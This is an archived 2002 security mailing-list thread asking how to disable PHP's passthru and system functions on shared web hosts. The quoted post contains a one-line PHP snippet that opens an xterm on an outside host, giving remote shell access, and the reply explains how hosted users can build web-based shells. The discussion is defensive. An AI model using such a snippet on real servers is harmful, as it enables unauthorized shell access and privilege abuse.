|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Lloyd Richardson (Lrichardson
mind.ca)Date: Wed Apr 24 2002 - 17:01:25 CDT
There are many ways of accomplishing the exact same thing. The problem is
that giving an ftp account on the box that allows them to upload things that
are executable via the webserver ( If the are allow to run cgi scripts etc..
) . You could write a very simple script to pass commands directly to
through the webserver that would run as whatever the virtually hosted
customers account was. ( This is assuming apache is running in a suexec
environment with php compiled to run via CGI) So basically, in a web
hosting environment an end user can basically build their own shell access
if the ISP doesn't provide it right into a HTTP page which is really nothing
new, and a good reason to keep an eye on suid local binaries....
-----Original Message-----
From: Evrim ULU [mailto:evrimenvy.com.tr]
Sent: Tuesday, April 23, 2002 3:15 AM
To: vuln-devsecurity-focus.com
Subject: php & passthru & system
hi,
i was wondering if there is a way to disable the passthru and system
functions in php easily.
There are a lot of webhosting firms serving php with ftp accounts and
i've seen that if their firewall is not configured properly i can open a
xterm with my user priviledges.
<?
passthru("`which xterm` --display=my_ip:0.0");
?>
same thing for system is also valid of course.
Abusing the system after having the shell access is easy. Most of the
sysadms do not patch the system since nobody have a valid shell access.
Is there an easy way to disable these function before compilation&after
compliation and any firewall rules like -A OUTPUT -p tcp
--destination-port 6000 -j DROP?
thnx.
-- Evrim ULU evrim
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]